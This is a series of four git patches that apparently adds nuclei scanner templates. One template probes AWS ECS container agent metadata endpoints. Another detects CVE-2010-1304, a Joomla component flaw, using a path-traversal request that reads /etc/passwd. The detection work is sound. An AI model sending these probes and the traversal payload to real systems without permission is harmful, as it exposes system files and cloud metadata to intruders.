From c8d2e57e979b0997c40e68066aef8c15d05f2001 Mon Sep 17 00:00:00 2001
From: Douglas Santos <douglas.secco@gmail.com>
Date: Fri, 27 Aug 2021 21:50:10 +0000
Subject: [PATCH 1/4] aws ecs container endpoint with juicy info

---
 .../aws-ecs-container-agent-tasks.yaml        | 22 +++++++++++++++++++
 1 file changed, 22 insertions(+)
 create mode 100644 miscellaneous/aws-ecs-container-agent-tasks.yaml

diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml
new file mode 100644
index 0000000000..26eb1b03c8
--- /dev/null
+++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml
@@ -0,0 +1,22 @@
+id: aws-ecs-container-agent-tasks
+
+info:
+  name: aws-ecs-container-agent-tasks
+  author: dogasantos
+  severity: info
+  tags: aws,docker
+  description: Aws container metadata content
+  reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/v1/metadata"
+      - "{{BaseURL}}/v1/tasks"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "arn:aws:ecs"
+      - type: status
+        status:
+          - 200

From f16e7fbb2a8d64e1243b154238b4633f57ace278 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Sun, 29 Aug 2021 15:15:16 +0530
Subject: [PATCH 2/4] misc update

---
 miscellaneous/aws-ecs-container-agent-tasks.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml
index 26eb1b03c8..f943f67776 100644
--- a/miscellaneous/aws-ecs-container-agent-tasks.yaml
+++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml
@@ -6,17 +6,20 @@ info:
   severity: info
   tags: aws,docker
   description: Aws container metadata content
-  reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html
+  reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect
+
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/v1/metadata"
       - "{{BaseURL}}/v1/tasks"
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "arn:aws:ecs"
+
       - type: status
         status:
-          - 200
+          - 200
\ No newline at end of file

From b01ae5648fd9064e6ee6562ef31d32b82d31c6c9 Mon Sep 17 00:00:00 2001
From: sandeep <sandeep@projectdiscovery.io>
Date: Sun, 29 Aug 2021 15:16:04 +0530
Subject: [PATCH 3/4] added tags

---
 miscellaneous/aws-ecs-container-agent-tasks.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/miscellaneous/aws-ecs-container-agent-tasks.yaml b/miscellaneous/aws-ecs-container-agent-tasks.yaml
index f943f67776..84ffe70e43 100644
--- a/miscellaneous/aws-ecs-container-agent-tasks.yaml
+++ b/miscellaneous/aws-ecs-container-agent-tasks.yaml
@@ -4,7 +4,7 @@ info:
   name: aws-ecs-container-agent-tasks
   author: dogasantos
   severity: info
-  tags: aws,docker
+  tags: aws,docker,ec2
   description: Aws container metadata content
   reference: https://docs.aws.amazon.com/en_us/elasticbeanstalk/latest/dg/create_deploy_docker_ecstutorial.html#create_deploy_docker_ecstutorial_connect_inspect
 

From f4777035ef53e95049740fb3367340805f7ff59e Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Sun, 29 Aug 2021 17:21:24 +0700
Subject: [PATCH 4/4] Create CVE-2010-1304.yaml

---
 cves/2010/CVE-2010-1304.yaml | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cves/2010/CVE-2010-1304.yaml

diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml
new file mode 100644
index 0000000000..96833ebf19
--- /dev/null
+++ b/cves/2010/CVE-2010-1304.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1304
+
+info:
+  name: Joomla! Component User Status - Local File Inclusion
+  author: daffainfo
+  severity: high
+  description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+  reference:
+    - https://www.exploit-db.com/exploits/11998
+    - https://www.cvedetails.com/cve/CVE-2010-1304
+  tags: cve,cve2010,joomla,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200